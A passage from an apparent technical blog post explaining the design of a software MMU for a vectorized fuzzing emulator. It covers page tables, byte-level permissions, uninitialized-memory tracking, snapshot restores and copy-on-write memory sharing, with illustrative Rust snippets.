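    /// Read `buf.len()` bytes from `addr`, failing if any byte is unreadable
    fn read(&self, addr: usize, buf: &mut [u8]) -> Result<(), ()> {
        let perms = self.perms.get(addr..addr + buf.len()).ok_or(())?;
        if perms.iter().any(|&p| p & PERM_READ == 0) {
            return Err(());
        }
        buf.copy_from_slice(&self.bytes[addr..addr + buf.len()]);
        Ok(())
    }
}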

During this blog we introduce a few big concepts:

  • Differential restores
  • Byte-level permissions
  • Read-after-write memory (uninitialized memory tracking)
  • Gage fuzzing
  • Aliased/CoW memory
  • Deduplicated memory
  • Technical details about the IL relevant to the MMU
  • Painful details about everything

Since this emulator design is meant to run multiple architectures and programs in different environments, it’s critical the MMU design supports a superset of the features of all the programs I may run. For example, system processes typically are run in the high memory ranges 0xffff... and above. Part of the design here is to make sure that a full guest address space can be used, including high memory addresses. Things like x86_64 have 48-bit address spaces, where things like ARM64 have 49-bit address spaces (2 separate 48-bit address spaces). Thus to run an ARM64 target on x86 I need to provide more bits than actually present. Luckily most systems use this address space sparsely, so by using different data structures we can support emulating these targets with ease.

The problem

Before we get into describing the solution, let’s address what the problem is in the first place!

When creating an emulator it’s important to create isolation between the emulated guest and the actual system. For example if the guest accesses memory, it’s important that it can only access its own memory, and that it isn’t overwriting the emulator’s memory itself. To do this there are multiple traditional solutions:

  • Restrict the address space of the guest such that it can fit entirely in the emulator’s address space
  • Use a data structure to emulate a sparse guest’s memory space
  • Create a new process/VM with only the guest’s memory mapped in

The first solution is the simplest, fastest, but also the least portable. It typically consists of allocating a buffer the size of the guest’s address space, and then any guest memory accesses are added to the base of this buffer and ensured to not go out of bounds. A model like this can rely on the hardware’s permission checking by setting permissions via mmap or VirtualProtect. This is an extremely fast model and allows for running applications that fit inside of the emulator’s address space. When running a 64-bit VM this can become tough as most OSes do not provide a means of allocating memory in the high part of the address space 0xffff... and beyond. This memory is typically reserved for the kernel. This is the model used by things like qemu-user as it is super fast and works great for well-behaving userland applications. By setting the QEMU_GUEST_BASE environment variable you can change this base and set the size with QEMU_RESERVED_VA.
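
A sketch of this first model, ignoring the hardware-permission trick and just doing an explicit bounds check, might look like the following (names are illustrative only):

/// Guest memory modeled as one flat allocation; a guest address is just an
/// offset into it. Illustrative sketch only.
struct FlatGuest {
    backing: Vec<u8>,
}

impl FlatGuest {
    fn read_u8(&self, guest_addr: usize) -> Option<u8> {
        // The bounds check stands in for the hardware permission checks a
        // real implementation would get from mmap/VirtualProtect
        self.backing.get(guest_addr).copied()
    }

    fn write_u8(&mut self, guest_addr: usize, val: u8) -> Option<()> {
        *self.backing.get_mut(guest_addr)? = val;
        Some(())
    }
}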

The second solution is fairly slow, but allows for more strict memory permissions than the host system allows. Typically the data structure used to access the guest’s memory is similar to traditional page table models used in hardware. However since it’s implemented in software it’s possible to change these page tables to contain any metadata or sizes as desired. This is the model I ultimately use, but with a few twists from traditional page tables.
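
As a toy sketch of this second model, here’s a 3-level software page table for a 32-bit guest, splitting the address into three 8-bit table indices and an 8-bit page offset (the same 256-byte-page shape mentioned in the history section below). None of these types are the emulator’s real structures:

/// Toy 3-level software page table: a 32-bit guest address is split into
/// three 8-bit table indices and an 8-bit page offset (256-byte pages).
type Page   = [u8; 256];
type Level3 = [Option<Box<Page>>; 256];
type Level2 = [Option<Box<Level3>>; 256];
type Level1 = [Option<Box<Level2>>; 256];

fn translate(table: &Level1, vaddr: u32) -> Option<(&Page, usize)> {
    let i1  = (vaddr >> 24) as usize & 0xff;
    let i2  = (vaddr >> 16) as usize & 0xff;
    let i3  = (vaddr >>  8) as usize & 0xff;
    let off =  vaddr        as usize & 0xff;

    // Walk the levels, failing if any table or page is unmapped
    let l2   = table[i1].as_deref()?;
    let l3   = l2[i2].as_deref()?;
    let page = l3[i3].as_deref()?;
    Some((page, off))
}

fn read_u8(table: &Level1, vaddr: u32) -> Option<u8> {
    let (page, off) = translate(table, vaddr)?;
    Some(page[off])
}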

The third solution leverages something like VT-x or a thin process to almost directly use the target hardware’s page table models for a VM. This ties the emulator to an architecture, might require a driver, and, like the first solution, doesn’t allow for stricter memory models. This is actually one of the first models I used in my emulator and I’ll go into it a bit more in the history section.


History

Feel free to skip this section if you don’t care about context

To give some background on how we ended up where we ended up it’s important to go through the background of the MMU designs used in the past. Note that the generations aren’t the same MMU improving, it’s just different MMUs I’ve designed over time.

First generation

The first generation of my MMU was a simple modification to QEMU to allow for quick tracking of which memory was modified. In this case my target was a system level target so I was not using qemu-user, but rather qemu-system. I ripped out the core physical memory manager in QEMU and replaced it with my own that effectively mimicked the x86 page table model. I was most comfortable with the x86 page table model and since it was implemented in hardware I assumed it was probably well engineered. The only interest I had in this first MMU was to quickly gather which memory was modified so I could restore only the dirtied memory to save time during resets. This gave a huge improvement for my hypervisor so it was natural for me to just copy it over to QEMU so I could get the same benefits.

Second generation

While still continuing on QEMU modifications I started to get a bit more creative. Since I was handling all the physical memory accesses directly in software, there was no reason I couldn’t use page tables of my own shape. I switched to using a page table that supported 32-bit addresses (my target was MIPS32 and ARM32) using 8-bits per table. This gave me 256-byte pages rather than traditional 4-KiB x86 pages and allowed me to reset more specific dirty pages, reducing the overall work for resets.

Third generation

At this point I was tinkering around with different page table shapes to find which worked fast. But then I realized I could set the final translation page size to 1-byte and I would be able to apply permissions to any arbitrary location in memory. Since memory of the target system was still using 4-KiB pages I wasn’t able to apply byte-level permissions in the snapshotted target, however I was able to apply byte-level permissions to memory returned from hooked functions like malloc(). By setting permissions directly to the size actually requested by malloc() we could find 1-byte out-of-bounds memory accesses. This ended up finding a bug which was only slightly out-of-bounds (1 or 2 bytes), and since this was now a crash it was prioritized for use in future fuzz cases. This prioritization (or feedback) eventually ended up with the out-of-bounds growing to hundreds of bytes, which would crash even on an actual system.

Fourth generation

I ended up designing my own emulator for MIPS32, performance wasn’t really the focus. I basically copied the model I used for the 3rd generation. I also kept the 1-byte paging as by this point it was a potent tool in my toolbag. However once I switched this emulator to use JIT I started to run into some performance issues. This caused me to drop the emulated page tables and byte level permissions and switch to a direct-memory-access model.

At this time I was doing most of my development for my emulator to run directly on my OS. Since my OS didn’t follow any traditional models this allowed me to create a user-land application with almost any address space as I wanted. I directly used the MMU of the hardware to support running my JIT in the context of a different address space. In this model the JITted code just directly accessed memory, which except for a few pages in the address space, was just the exact same as the actual guest’s address space.

For example if the guest wanted to access address 0x13370000, it would just directly dereference the memory at 0x13370000. No translation, no base applied, simple.

You can see this code in the srcs/emu folder in falkervisor.

I used this model for a long time as it was ideal for performance and didn’t really restrict the guest from any unique address space shapes. I used this memory model in my vectorized emulator for quite a while as well, but with a scale applied to the address as I interleaved multiple VM’s memory.

Fifth generation

The vectorized emulator was initially designed for hard targets, and the primary goal was to extract as much information as possible from the code under test. When trying to improve its ability to find bugs I remembered that in the past I had done a byte-level MMU with much success. I had a silly idea of how I could handle these permission checks. Since in the JIT I control what code is run when doing a read or write, I could simply JIT code to do the permission checks. I decided that I would simply have 1 extra byte for every byte of the target. This byte would hold all of the permissions for the corresponding byte in the memory map (read, write, and/or execute).

Since now I needed to have 2 memory regions for this, I started to switch from using my OS and the stripped down user-land process address space to using 2 linear mappings in my process. Since this was more portable I decided to start developing my vectorized emulator to run on just Windows/Linux. On a guest memory access I would simply bounds check the address to make sure it’s in a certain range, and then add the address to the base/permission allocations. This is similar to what qemu-user does but with a permission region as well. The JIT would check these permissions by reading the permissions memory first and checking for the corresponding bits.

Sixth generation

The performance of the fifth generation MMU was pretty good for JIT, but was terrible for process start times. I would end up reserving multiple terabytes of memory for the guest address spaces. This made it take a long time to start up processes and even tear them down as they blocked until the OS cleaned up their resources. Further commit memory usage was quite high as I would commit entire 4-KiB guest pages, which were actually 128-KiB (16 vectorized VMs * 2 regions (permission and memory region) * 4 KiB). To mitigate these issues we ended up at the current design….


Page Tables

Before we hop into soft MMU design it’s important to understand what I mean when I say page tables. Page tables take some bit-slice of the address to be translated and use it as the index for an element in a first level table. This table points to another table which is then indexed by a different bit-slice of the same address. This may continue for however many levels are used in the page table. In my case the shape of this page table is dynamically configurable and we’ll go into that a bit more.

Page table

In the case of 64-bit x86 there is a 4 level lookup, where 9 bits are used for each level. This means each page table contains 512 entries. Each entry is a pointer to the next page table, or the actual page if it’s the final level. Finally the bottom 12 bits of the address are used as the offset into the page to find the specific byte. This paging model would show up as [9, 9, 9, 9, 12] according to my dynamic paging model. This syntax will be explained later.

For x86 there are alignment requirements for the page table entries (must be 4-KiB aligned). Further physical addresses are only 52-bits. This leaves 12 bits at the bottom of the page table entry and 12 bits at the top for use as metadata. x86 uses this to store information such as: If the page is present, writable, privileged, caching behavior, whether it’s been accessed/modified, whether it’s executable, etc. This metadata has no cost in hardware but in software, traversing this has a cost as the metadata must be masked off for the pointer to be extracted. This might not seem to matter but when doing billions of translations a second, the extra masking operations add up.
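To make that masking cost concrete, here’s a minimal sketch (not code from the emulator) of recovering the next-level pointer from a 64-bit x86 page table entry, assuming the standard 4-KiB entry layout where bits 51:12 hold the physical address:

/// Extract the next-level table address from an x86-64 page table entry.
/// Bits 51:12 hold the 4-KiB-aligned physical address; the low 12 and high
/// 12 bits are metadata which must be masked away on every level of a walk.
fn x86_next_level(entry: u64) -> u64 {
    entry & 0x000f_ffff_ffff_f000
}

fn main() {
    // Entry with present/writable metadata set in the low bits
    let entry = 0x0000_0001_2345_6003u64;
    assert_eq!(x86_next_level(entry), 0x0000_0001_2345_6000);
}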

Here’s the actual metadata of a 4 KiB page on 64-bit Intel:

Page table metadata


The overall design

My vectorized emulator is being rewritten to be 64-bit rather than 32-bit. We’re now running 2048 VMs rather than 4096 VMs as we can only run 8 VMs per thread. All of this design is for 64-bits.

When designing the new MMU there were a few critical features it needed:

  • Byte level permissions
  • Fast snapshot/restore times
  • A data structure that could be quickly traversed in JIT
  • Quick process start times
  • The ability to handle full 64-bit address spaces
  • Low memory usage (we need to run 2048 VMs)
  • Quick methods for injecting fuzz inputs (we need a way to get fuzz inputs in to the memory millions of times per second)
  • Must be easily tested for correctness
  • Ability to track uninitialized memory at a byte-level
  • Read-only memory shared between all cores

Applying byte-level permissions

So we have this byte-level permission goal, but how do we actually get byte-level information to apply anyways?

Since most fuzzing is done from an already-existing snapshot from a real system with 4 KiB paging and permissions, we cannot just magically get byte-level permissions. We have to find locations that can be restricted to specific byte-level sizes.

The easiest way to do this is just ignore everything in the snapshot. We can apply byte-level permissions to only new memory allocations that we emulate by adding breakpoints to the target’s allocate routines. Further by hooking frees we can delete the mappings and catch use-after-frees.
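As a rough sketch of what those hooks look like (the Mmu type and set_perms signature here are placeholders for illustration, not the emulator’s actual API):

/// Hypothetical MMU handle; the type and set_perms signature are made up
/// for illustration only.
struct Mmu;

impl Mmu {
    /// Apply byte-level read/write permissions to every byte in
    /// [addr, addr + size)
    fn set_perms(&mut self, addr: u64, size: u64, read: bool, write: bool) {
        // ... update the per-byte permission bytes ...
        let _ = (addr, size, read, write);
    }
}

/// Breakpoint handler for the target's malloc(): restrict permissions to
/// exactly the requested size so even a 1-byte overflow faults
fn hook_malloc(mmu: &mut Mmu, ret_ptr: u64, requested_size: u64) {
    mmu.set_perms(ret_ptr, requested_size, true, true);
}

/// Breakpoint handler for the target's free(): revoke all access so any
/// use-after-free faults immediately
fn hook_free(mmu: &mut Mmu, ptr: u64, alloc_size: u64) {
    mmu.set_perms(ptr, alloc_size, false, false);
}

fn main() {
    let mut mmu = Mmu;
    hook_malloc(&mut mmu, 0x1000, 13); // byte-precise 13-byte allocation
    hook_free(&mut mmu, 0x1000, 13);
}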

We can get a bit more fancy if we’re enlightened as to the internals of the allocator of the target under test. Upon loading of the snapshot we could walk the heap metadata and trim down allocations to the byte-level sizes they originally requested. If the heap metadata does not record the requested size then this is not possible. Further, allocations which fit perfectly in a bin might not have any room after them to place even a single guard byte.

To remedy these problems there are a few solutions. We can use page heap in the application we’re taking a snapshot of, which will always ensure we have a page after the allocation we can play with for guard bytes. Further, page heap stores the requested size in its metadata so we can get perfect byte-level permissions applied.

If page heap is not available for the allocator you’re gonna have to get really creative and probably replace the allocator. You could also hack it up and use a debugger to always add a few bytes to each allocation (ensuring room for guard bytes), while logging the requested sizes. This information could then be used to create a perfect byte heap.

Getting even fancier

When going at a really hard target you could also start to add guard bytes between padding fields of structures (using symbol information or compiler plugins) and globals. The more you restrict, the more you can detect.


Design features

Basics of the vectorized model

This was covered in the intro, but since it’s directly applicable to the MMU it’s important to mention here.

Memory between the different lanes on a given core is interleaved at the 8-byte level (4-byte level for 32-bit VMs). This means that when accessing the same address on all VMs we’re able to dispatch a single read at one address to load all 8 VMs’ memory. This has the downside of unaligned memory accesses being much more expensive as they now require multiple loads. However, in the common case memory is accessed at the same address across VMs and does not straddle an 8-byte boundary. It’s worth it.

For reference, the cost of a single vmovdqa64 load is about 4-5 cycles, while a vpgatherqq load is 20-30 cycles. Unless memory is very frequently accessed from differing addresses or straddles 8-byte boundaries, interleaving is always worth it.

VM interleaving looks as follows:

chart simplified to show 4 lanes instead of 8

Guest Address   Host Address   Qword 1   Qword 2   Qword 3   Qword 8
0x0000          0x0000               1         2         3        33
0x0008          0x0040              32        74        55        45
0x0010          0x0080              24        24        24        24

This interleaves all the memory between the VMs at an 8-byte level. If a memory access straddles an 8-byte value things get quite slow but this is a rare case and we’re not too concerned about it.
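The address math implied by the table above is straightforward; here’s a minimal sketch assuming 8 interleaved lanes, with the table’s host address corresponding to lane 0’s copy:

/// Number of VM lanes interleaved per hardware thread
const NUM_LANES: u64 = 8;

/// Convert a guest address into the host offset of a specific lane's copy
/// inside the interleaved backing memory (8-byte interleaving).
fn interleaved_offset(guest_addr: u64, lane: u64) -> u64 {
    let qword  = guest_addr / 8; // which 8-byte chunk of the guest
    let within = guest_addr % 8; // byte offset inside that chunk
    qword * (NUM_LANES * 8) + lane * 8 + within
}

fn main() {
    // Matches the table: guest 0x0008 starts at host offset 0x0040
    assert_eq!(interleaved_offset(0x0000, 0), 0x0000);
    assert_eq!(interleaved_offset(0x0008, 0), 0x0040);
    assert_eq!(interleaved_offset(0x0010, 0), 0x0080);
}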

How do we build a testable model?

To start off development it was important to build a good foundation that could be easily tested. To do this I tried to write everything as naively as possible to decrease the chance of mistakes. Since performance is only really required in the JIT, the Rust-level MMU routines were written cleanly and used as the reference implementation to test against. If high-performance methods were needed for modifying memory or permissions they would be supplemental and verified against the naive implementation. This set us up to be in good shape for testing!

64-bit address spaces

To support full 64-bit address spaces we are forced to use some data structure to handle memory as nothing in x86 can directly use a 64-bit address space. Page tables continue to be the design we go with here.

Since we were writing the code in a naive way, it was easy to make most of the MMU model configurable by constants in the code. For example the shape of the page tables is defined by a constant called PAGE_TABLE_LAYOUT. This is used in reality in the form: const PAGE_TABLE_LAYOUT: [u32; PAGE_TABLE_DEPTH] = [16, 16, 16, 13, 3];.

This array defines the number of bits used for translating each level in the page table, and PAGE_TABLE_DEPTH sets the number of levels in the page table. In the example above this shows that we use the top 16-bits for the first level as the index, the next 16-bits for the next level, the next 16-bits again for another level, a 13-bit level, and finally a 3-bit page size. As long as this PAGE_TABLE_LAYOUT adds up to 64-bits, contains at least 2 entries (1 level page table), and at least has a final translation size of 8-byte (like in the example), the MMU and JITs will be updated. This allows profiling to be done of a specific target and modify the page table to whatever shape works best. This also allows for changes between performance and memory usage if needed.
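As a minimal sketch of what this layout means for a translation, here’s how a 64-bit address gets sliced into per-level indices for the example shape (the helper is illustrative, not the emulator’s actual code):

/// Example shape from above: 16/16/16/13-bit table levels and an
/// 8-byte (3-bit) final page size.
const PAGE_TABLE_DEPTH: usize = 5;
const PAGE_TABLE_LAYOUT: [u32; PAGE_TABLE_DEPTH] = [16, 16, 16, 13, 3];

/// Slice a 64-bit guest address into one index per level, consuming bits
/// from the top down. The last entry is the byte offset into the final page.
fn split_address(addr: u64) -> [u64; PAGE_TABLE_DEPTH] {
    let mut remaining = 64u32;
    let mut indices = [0u64; PAGE_TABLE_DEPTH];
    for (ii, &bits) in PAGE_TABLE_LAYOUT.iter().enumerate() {
        remaining -= bits;
        indices[ii] = (addr >> remaining) & ((1u64 << bits) - 1);
    }
    indices
}

fn main() {
    let idx = split_address(0xffff_8000_1337_1338);
    assert_eq!(idx[0], 0xffff); // top 16 bits index the first table
    assert_eq!(idx[4], 0x0);    // bottom 3 bits are the in-page offset
}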

Fast restores

When writing my hypervisor I walked the SVM page tables looking for dirty pages to restore. On x86 there are only dirty bits on the last level of the page tables. For all other levels there’s only an ‘accessed’ bit (updated when the translation is used for any access). I would walk every entry in each page table, if it was accessed I would recurse to the next level, otherwise skip it, at the final level I would check for the dirty bit and only restore the memory if it was marked as dirty. This meant I walked the page tables for all the memory that was ever used, but only restored dirty memory. Walking the page tables caused quite a bit of cache pollution which would cause significant damage to the performance of other cores.

To speed this up I could potentially place a dirty bit on every page table level, and then I would only ever start walking a path that contains a dirty page. I used this model at some point historically, however I’ve got a better model now.

Instead of walking page tables I just now append the address to a vector when I first set a dirty bit. This means when resetting a VM I only read a linear array of addresses to restore. I still need a dirty bit somewhere so I make sure I don’t add duplicates to this list. Since I no longer need to walk page tables I only put dirty bits on the final level. This was a decision driven by actual data on real targets, it’s much faster.

If during execution I run out of entries in this dirty list I exit out of the VM with a special VM-exit status indicating this list is full. This then allows me to append this list at Rust-level to a dynamically sized allocation. Since the size of this list is tunable it would grow as needed and converge to never hitting VM-exits due to dirty list exhaustion. Further this dirty list is typically pretty tiny so the cost isn’t that high.
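A minimal sketch of this dirty tracking (the names and types here are assumptions for illustration, not the emulator’s code):

/// Sketch of the dirty tracking described above
struct DirtyState {
    /// Fixed-capacity list of (guest, translated) addresses dirtied so far
    dirty_list: Vec<(u64, u64)>,
    /// Capacity before we force a VM exit so Rust-level code can grow it
    capacity: usize,
}

enum VmExit {
    DirtyListFull,
}

impl DirtyState {
    /// Called on a write when the final-level dirty bit was not yet set
    fn mark_dirty(&mut self, guest: u64, translated: u64) -> Result<(), VmExit> {
        if self.dirty_list.len() >= self.capacity {
            // Special VM exit: the caller grows the list and re-enters the VM
            return Err(VmExit::DirtyListFull);
        }
        self.dirty_list.push((guest, translated));
        Ok(())
    }

    /// On reset, restore only the pages recorded as dirty
    fn reset(&mut self, restore_page: impl Fn(u64, u64)) {
        for &(guest, translated) in &self.dirty_list {
            restore_page(guest, translated);
        }
        self.dirty_list.clear();
    }
}

fn main() {
    let mut state = DirtyState { dirty_list: Vec::new(), capacity: 1024 };
    let _ = state.mark_dirty(0x1337_0000, 0xdead_0000);
    state.reset(|guest, host| println!("restore {:#x} from {:#x}", guest, host));
}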

Interestingly Intel introduced (not sure if it’s in silicon yet) a way of getting a similar thing for VMs (this is called Page Modification Logging). The processor itself will give you a linear list of dirty pages. We do not use this as it is not supported in the processor we are using.

Permissions

On classic x86 (and really any other architecture) permission bits are added at each level of the page table. This allows the processor to abort a page table walk early, and also allows OSes to change permissions for large regions of memory by updating a single entry. However since we’re running multiple VMs at the same time it’s possible each VM has different memory mapped in. To handle this we need a permission byte for each byte of each VM.

Since we can’t handle the permissions checks during the page table walk (technically could be possible if the permissions are a superset of all the VM’s permissions), we get to have a metadata-less page table walk until the final level where we store the dirty bit. This means that during a page table walk we do not need to mask off bits, we can just directly keep dereferencing.

There are currently 4 permission bits. A read bit, a write bit, an execute bit, and a RaW bit (see next section). All of these bits are completely independent. This allows for arbitrary permission sets like write-only memory, and execute-only memory.
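A sketch of the permission encoding (the exact bit positions here are an assumption; only the fact that the four bits are independent matters):

/// Hypothetical per-byte permission bits; positions chosen for illustration
const PERM_READ:  u8 = 1 << 0; // byte may be read
const PERM_WRITE: u8 = 1 << 1; // byte may be written
const PERM_EXEC:  u8 = 1 << 2; // byte may be executed
const PERM_RAW:   u8 = 1 << 3; // byte becomes readable only after a write

fn main() {
    // Independent bits allow unusual sets like write-only memory
    let write_only = PERM_WRITE;
    assert_eq!(write_only & (PERM_READ | PERM_EXEC | PERM_RAW), 0);
}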

In some older versions of my MMU I had a page table for both permissions and data. This is pretty pointless as they always have the same shape. This caused me to perform 2 page table walks for every single memory access.

In the new model I interleave the memory and permissions for the VMs such that one walk will give me access to both the permissions and the memory contents. Further, in memory the permissions come first followed by the contents. Since permissions are checked first this allows for the memory to be accessed linearly and potentially get a speedup from the hardware prefetchers.

When permissions and contents are laid out in a pretty format it looks something like:

Simplified to 4 lanes instead of 8 MMU layout

We can see every byte of contents has a byte of permissions and the permissions come first in memory. This image displays directly how the memory looks if you were to dump the MMU region for a page as qwords.

Uninitialized memory tracking

To track uninitialized memory I introduce a new permission bit called the RaW (read-after-write) bit. This bit indicates that memory is only readable after it has been written to. In allocator hooks or by manual application to regions of memory this bit can be set and the read bit cleared.

On all writes to memory the RaW bit is unconditionally copied to the read bit. It’s done unconditionally because it’s cheaper to shift-and-or every time than to have a conditional operation.

Simple as that, now memory marked as RaW and non-readable will become readable on writes! Just like all other permission bits this is byte-level. malloc()ing 8 bytes, writing one byte to it, and then reading all 8 bytes will cause an uninitialized memory fault!
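Here’s a minimal sketch of that shift-and-or, using the assumed bit positions from the permission sketch above (RaW in bit 3, read in bit 0):

const PERM_READ: u8 = 1 << 0; // assumed bit positions, as above
const PERM_RAW:  u8 = 1 << 3;

/// On every write, unconditionally copy the RaW bit down into the read bit
fn update_perms_on_write(perm: u8) -> u8 {
    perm | ((perm & PERM_RAW) >> 3)
}

fn main() {
    // A RaW, writable, non-readable byte becomes readable after a write
    let before = PERM_RAW | (1 << 1);
    assert_eq!(before & PERM_READ, 0);
    assert_eq!(update_perms_on_write(before) & PERM_READ, PERM_READ);
}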


Gage fuzzing

Okay there’s probably a name for this already but I call it ‘gage’ fuzzing (from gage blocks, precisely ground measurement references). It’s a precise fuzzing technique I use where I start without a snapshot at all, but rather just the code. In this case I load up a PE/ELF, mark all writable regions as read-after-write, and point PC to a function I want to fuzz. Further I set up the parameters to the function, and if one of the parameters happens to be a pointer to memory I don’t understand yet, I can mark the contents of the pointer to read-after-write as well.

As globals and parameters are used I get faults telling me that uninitialized memory was used. This allows me to reverse out the specific fields that the function operates on as needed. Since the memory is read-after-write, if the function writes to the memory prior to reading it then I don’t have to worry what that memory is at all.

This process is extremely time consuming, but it is basically dynamic-driven reversing/source auditing. You lazily reverse the things you need to, which forces you to understand small pieces at a time. While you build understanding of the things the function uses you ultimately learn the code and learn potential places to audit more or add things like guard bytes.

This is my go-to methodology for fuzzing extremely hard targets where every advantage is required. Further this works for fuzzing codebases which are not runnable, or you only have partial snapshots of. Works great for kernel fuzzing or firmware fuzzing when you don’t have a great way of getting a snapshot!

I mention ‘function’ in this case but there’s nothing restricting you from fuzzing a whole application with this model. Things without global state can be trivially fuzzed in their entirety with a model like this. Further, I’ve done things like call the init routine for a class/program and then jump to the parser when init returns to skip some of the manual processing.


Theory into practice

So we know the features and what we want in theory, however in practice things get a lot harder. We have to abide by the design decisions while maintaining some semblance of performance and support for edge cases in the JIT.

We’ve got a few things that could make this hard to JIT. First of all performance is going to be an issue, we need to find a way to minimize the frequency of page table walks as well as decrease the cost of a walk itself. Further we have to be able to support edge cases where VMs are disabled, pages are not present, and VMs are accessing different memory at the same time.

64-bit saves the day

Since now the vectorized emulator is 64-bit rather than 32-bit, we can hold pointers in lanes of the vector. This allows us to use the scatter and gather instructions during page table walks. However, while magical and fast at what they do, these scatter/gather instructions are much slower than their standard load/store counterparts.

Thus in the edge case where VMs are accessing different memory we are able to vectorize the page table walks. This means we’re able to perform 8 completely different page table walks at the same time. However in most cases VMs are accessing the same memory and thus it’s cheaper for us to check if we’re accessing different memory first, and either perform the same walk for all VMs (same address), or perform a vectorized page table walk with scatter/gather instructions.

In the case of differing addresses this vectorized page table walk is much faster than 8 separate walks and provides a huge advantage over the previous 32-bit model.

Handling non-present pages

Typically in most architectures there is a present bit in the page tables to indicate that an entry is valid. This really just exists so that physical address 0 (NULL) can still be mapped in page tables. Since we’re running as a user application using virtual addresses, we cheat and just use host pointers as the page table entries.

If an entry is NULL (64-bit zero), then we stop the walk and immediately deliver a fault. This means to perform the page table walk until the final page we simply read a page table entry, check if it’s zero, and go to the next level. No need to mask off permission/present bits. For the final level we have a dirty bit, and a few more bits which we must mask off. We’ll discuss these other bits later.
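As a small sketch of following a single entry during the walk (the metadata bit positions are assumptions; in the real MMU the entry is simply a host pointer):

/// Assumed final-level metadata bits stored in the low bits of the entry
const ENTRY_DIRTY:   u64 = 1 << 0;
const ENTRY_ALIASED: u64 = 1 << 1;
const ENTRY_COW:     u64 = 1 << 2;
const ENTRY_META:    u64 = ENTRY_DIRTY | ENTRY_ALIASED | ENTRY_COW;

/// Follow one page table entry: zero means non-present (deliver a fault),
/// otherwise the entry is the pointer to the next level. Only final-level
/// entries carry metadata which has to be masked off before use.
fn follow_entry(entry: u64, final_level: bool) -> Option<u64> {
    if entry == 0 {
        // Non-present: stop the walk and deliver a fault
        return None;
    }
    Some(if final_level { entry & !ENTRY_META } else { entry })
}

fn main() {
    assert_eq!(follow_entry(0, false), None);
    assert_eq!(follow_entry(0x1000, false), Some(0x1000));
    // Final level: strip the dirty bit to recover the page pointer
    assert_eq!(follow_entry(0x2000 | ENTRY_DIRTY, true), Some(0x2000));
}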

What is a page fault?

In the case of a non-present page in the page table, or a permission bit not being present for the corresponding operation we need a way to deliver a page fault. Since the VM is just effectively one big function, we’re able to set a register with a VM exit code and return out. This is an implementation detail but it’s important that a ret allows us to exit from the emulator at any time.

Further since it’s possible VMs could have different permissions or page tables, we report a caused_vmexit mask, which indicates which lanes of the vector were responsible for causing the exception. This allows us to record the results, disable the faulting VMs, and re-enter the emulator to continue running the remaining VMs.

Memory costs

Since we’re running vectorized code we interleave 8 VMs at the same time. Further there is a permission byte for every byte. We also have a minimum page size of 8-bytes. Meaning the smallest possible actual commit size for a page on a single hardware thread is 128 bytes. PAGE_SIZE (8 bytes) * NUM_VMS (8) * 2 (permission byte and content byte). This is important as a single 4096-byte x86 page is actually 64 KiB. Which is… quite large. The larger the page size the better the performance, but the higher memory usage.

Saving time and memory

We’ve discussed that the previous MMU model used was quite slow for startup and shutdown times. This mean it could take 30+ seconds to start the emulator, and another 30 seconds to exit the process. Even with a hard ctrl+c.

To remedy this, everything we do is lazy. When I say lazy I mean that we try to only ever create mappings, copies, and perform updates when absolutely required.

VMs have no memory to start off

When a VM launches it has zero memory in its MMU. This means creating a VM costs almost nothing (a few milliseconds). It creates an empty page table and that’s it.

So where does memory come from?

Since a VM starts off with no memory at all, it can’t possibly have the contents of the snapshot we are executing from. This is because only the metadata of the snapshot was processed. When the VM attempts to touch the first memory it uses (likely the memory containing the first instruction), it will raise an exception.

We’ve designed the MMU such that there is an ability to install an exception handler. This means that on an exception we can check if the input snapshot contained the memory we faulted on. If it did then we can read the memory from the snapshot and map it in. Then the VM can be resumed.

This has the awesome effect that only memory which is ever touched is brought in from disk. If you have a 100 terabyte memory snapshot but the fuzz case only touches 1 MiB of memory, you only ever actually read 1 MiB from disk (plus the metadata of the snapshot, e.g. PE/ELF headers). This memory is pulled in based on the page granularity in use. Since this is configurable you can tweak it to your heart’s desire.

Sharing memory / forking

Memory which is only ever read has no reason to be copied for every VM. Thus we need a mechanism for sharing read-only memory between VMs. Further memory is shared between all cores running in the same “IL session”, or group of VMs fuzzing the same code and target.

We accomplish this by using a forking model. A ‘master’ MMU is created and an exception handler is installed to handle faults (to lazily pull in memory contents). The master MMU is the template for all future VMs and is the state of memory upon a reset.

When a core comes up, a fork from this ‘master’ MMU is created. Once again this is lazy. The child has no memory mapped in and will fault in pages from the master when needed.

When a page is accessed for reading only by a child VM the page in the child is directly mapped to the master’s copy. However since this memory could theoretically have write-permissions at the byte level, we protect this memory by setting an aliased bit on the last level page table, next to the dirty bit. This gives us a mechanism to prevent a master’s memory from ever getting updated even if it’s writable.

To allow for writes to the VM we add another bit to the last level page tables, a cow, or copy-on-write, bit. This is always accompanied with the aliased bit, and instead of delivering a fault on a write-to-aliased-memory access, we create a copy of the master’s page and allow writes to that.
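Putting the two bits together, a write to a translated page has three possible outcomes; here’s a sketch of that decision (bit positions assumed, as before):

/// Assumed final-level metadata bit positions
const ENTRY_ALIASED: u64 = 1 << 1;
const ENTRY_COW:     u64 = 1 << 2;

/// What a write has to do once the final-level entry has been read
enum WriteAction {
    Direct,        // exclusively owned page: write in place
    CopyThenWrite, // aliased + CoW: clone the master's page, write the copy
    Fault,         // aliased without CoW: the master must never be modified
}

fn write_action(entry: u64) -> WriteAction {
    if entry & ENTRY_ALIASED == 0 {
        WriteAction::Direct
    } else if entry & ENTRY_COW != 0 {
        WriteAction::CopyThenWrite
    } else {
        WriteAction::Fault
    }
}

fn main() {
    assert!(matches!(write_action(0x1000), WriteAction::Direct));
    assert!(matches!(write_action(0x2000 | ENTRY_ALIASED | ENTRY_COW),
                     WriteAction::CopyThenWrite));
    assert!(matches!(write_action(0x3000 | ENTRY_ALIASED),
                     WriteAction::Fault));
}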

An example in aliased/CoWed memory access

This leads us to a pretty sophisticated potential model of fault patterns. Let’s walk through a common case example.

  • An empty master MMU is created
  • An exception handler is added to the master MMU that faults in pages from the disk on-demand
  • A child is forked from the master
  • A read occurs to a page in the child
  • This causes an exception in the child as it has no memory
  • The exception handler recognizes there’s a master for this child and goes to access the master’s memory for this page
  • The master has no memory for this page and causes an exception
  • The master’s exception handler handles loading the page from disk, creating an entry
  • The master returns out with exception handled
  • The child directly links in the master’s page as aliased
  • Child returns with no exception
  • Child then dispatches a write to the same memory
  • The page is marked as aliased and thus cannot be written to
  • A copy of the master’s page is made
  • The permissions are checked in the page for write-access for all bytes being written to
  • The write occurs in the child-owned page
  • Success

While this is quite slow for the initial access, the child maintains its CoWed memory upon reset. This means that while the first few fuzz cases may be slow as memory is faulted in and copied, this cost eventually completely disappears as memory reaches a steady-state.

